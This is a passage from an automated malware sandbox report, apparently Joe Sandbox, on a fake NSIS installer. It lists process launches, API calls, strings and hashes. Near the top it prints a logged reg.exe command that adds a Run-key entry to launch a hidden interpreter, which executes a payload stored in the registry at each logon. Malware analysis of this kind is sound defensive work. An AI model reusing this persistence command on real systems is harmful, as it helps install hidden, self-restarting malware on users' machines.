Start time:	05:47:01
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
Imagebase:	0x880000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:47:13
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
Imagebase:	0x760000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:47:45
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068
Imagebase:	0x760000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.8%
Total number of Nodes:	1320
Total number of Limit Nodes:	32

Executed Functions

Function 0040338F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033B2
GetVersion.KERNEL32 ref: 004033B8
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
OleInitialize.OLE32(00000000), ref: 0040342F
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
GetCommandLineW.KERNEL32(Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
CharNextW.USER32(00000000,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000020,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
ExitProcess.KERNEL32 ref: 00403724
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
CopyFileW.KERNEL32(00442800,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
AdjustTokenPrivileges.ADVAPI32 ref: 00403882
ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
ExitProcess.KERNEL32 ref: 004038CA

Strings

.tmp, xrefs: 0040374B
NSIS Error, xrefs: 00403451
C:\Users\user\Desktop, xrefs: 00403756, 0040375B, 00403788
"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 00403466, 0040346C, 00403660
TEMP, xrefs: 00403617
Error launching installer, xrefs: 004036BA
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 004036E0
1033, xrefs: 00403633
~nsu, xrefs: 0040372F
UXTHEME, xrefs: 004033DF, 004033E4, 004033EA
SeShutdownPrivilege, xrefs: 00403859
Dicyanodiamide Setup, xrefs: 00403456
Low, xrefs: 00403605
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 004035B5, 004036D5, 0040377F, 00403789
TMP, xrefs: 0040361F
C:\Users\user\AppData\Local\Temp\, xrefs: 004035C7, 004035CC, 004035E2, 004035EE, 004035FD, 0040360A, 00403616, 0040361E, 00403734, 00403745, 00403750, 0040375C, 00403769, 00403778, 00403829
\Temp, xrefs: 004035E9

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\Desktop$Dicyanodiamide Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3611373375
Opcode ID: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
Opcode Fuzzy Hash: 418f7ce21fe45f15723f9083b8ef212d9f55cacd26bf177e771f1ddffbd24179
Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004054BF
GetDlgItem.USER32(?,000003EE), ref: 004054CE
GetClientRect.USER32(?,?), ref: 0040550B
GetSystemMetrics.USER32(00000002), ref: 00405512
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
ShowWindow.USER32(?,00000008), ref: 004055AE
GetDlgItem.USER32(?,000003EC), ref: 004055CF
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
GetDlgItem.USER32(?,000003F8), ref: 004054DD

Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274

GetDlgItem.USER32(?,000003EC), ref: 00405621
CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
CloseHandle.KERNELBASE(00000000), ref: 00405636
ShowWindow.USER32(00000000), ref: 0040565A
ShowWindow.USER32(00010462,00000008), ref: 0040565F
ShowWindow.USER32(00000008), ref: 004056A9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
CreatePopupMenu.USER32 ref: 004056EE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
GetWindowRect.USER32(?,?), ref: 00405722
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
OpenClipboard.USER32(00000000), ref: 00405783
EmptyClipboard.USER32 ref: 00405789
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
GlobalLock.KERNEL32(00000000), ref: 0040579F
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
GlobalUnlock.KERNEL32(00000000), ref: 004057D3
SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
CloseClipboard.USER32 ref: 004057E4

Strings

{, xrefs: 004056C7

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

Function 00404722 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404771
SetWindowTextW.USER32(00000000,?), ref: 0040479B
SHAutoComplete.SHLWAPI(00000000,00000001,00000007,00000000,?,00000014,?,?,00000001,?), ref: 004047D5
SHBrowseForFolderW.SHELL32(?), ref: 0040484C
CoTaskMemFree.OLE32(00000000), ref: 00404857
lstrcmpiW.KERNEL32(Space available: ,0042D248,00000000,?,?), ref: 00404889
lstrcatW.KERNEL32(?,Space available: ), ref: 00404895
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7

Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917

Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

GetDiskFreeSpaceExW.KERNELBASE(C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,?,00000001,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,000003FB,?), ref: 0040491E
GetDiskFreeSpaceW.KERNEL32(C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,0000040F,?,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,00000001,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,000003FB,?), ref: 0040496A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985

Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 00404872
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 004048EF, 004048F5, 0040491D, 0040492C, 00404944, 0040494A, 00404969
A, xrefs: 00404845
Space available: , xrefs: 00404883, 00404888, 00404893

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$Space available:
API String ID: 4039761011-2118535413
Opcode ID: 19144fdb0e9d5125f4be3c742e337db7ee30f83b3349ebaf1c2c387393fadd81
Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
Opcode Fuzzy Hash: 19144fdb0e9d5125f4be3c742e337db7ee30f83b3349ebaf1c2c387393fadd81
Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D

Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,753B3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,753B3420), ref: 00406608
FindClose.KERNELBASE(00000000), ref: 00406614

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
ShowWindow.USER32(?), ref: 00403DB1
DestroyWindow.USER32 ref: 00403DC5
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
GetDlgItem.USER32(?,?), ref: 00403E02
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
IsWindowEnabled.USER32(00000000), ref: 00403E1D
GetDlgItem.USER32(?,00000001), ref: 00403ECB
GetDlgItem.USER32(?,00000002), ref: 00403ED5
SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
GetDlgItem.USER32(?,00000003), ref: 00403FE6
ShowWindow.USER32(00000000,?), ref: 00404007
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
EnableWindow.USER32(?,?), ref: 00404034
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
EnableMenuItem.USER32(00000000), ref: 00404051
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
SetWindowTextW.USER32(?,0042D248), ref: 004040BA
ShowWindow.USER32(?,0000000A), ref: 004041EE

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,753B3420,"C:\Users\user\Desktop\zR4aIjCuRs.exe",00000000), ref: 00403A2B
lstrlenW.KERNEL32(Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
lstrcmpiW.KERNEL32(?,.exe,Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
GetFileAttributesW.KERNEL32(Space available: ), ref: 00403AC9
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges), ref: 00403B12

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

RegisterClassW.USER32(00433E80), ref: 00403B4F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
ShowWindow.USER32(00000005,00000000), ref: 00403BD2
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
RegisterClassW.USER32(00433E80), ref: 00403C14
DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33

Strings

.DEFAULT\Control Panel\International, xrefs: 00403A16
RichEd32, xrefs: 00403BE6
Control Panel\Desktop\ResourceLocale, xrefs: 004039DE
"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 004039AE
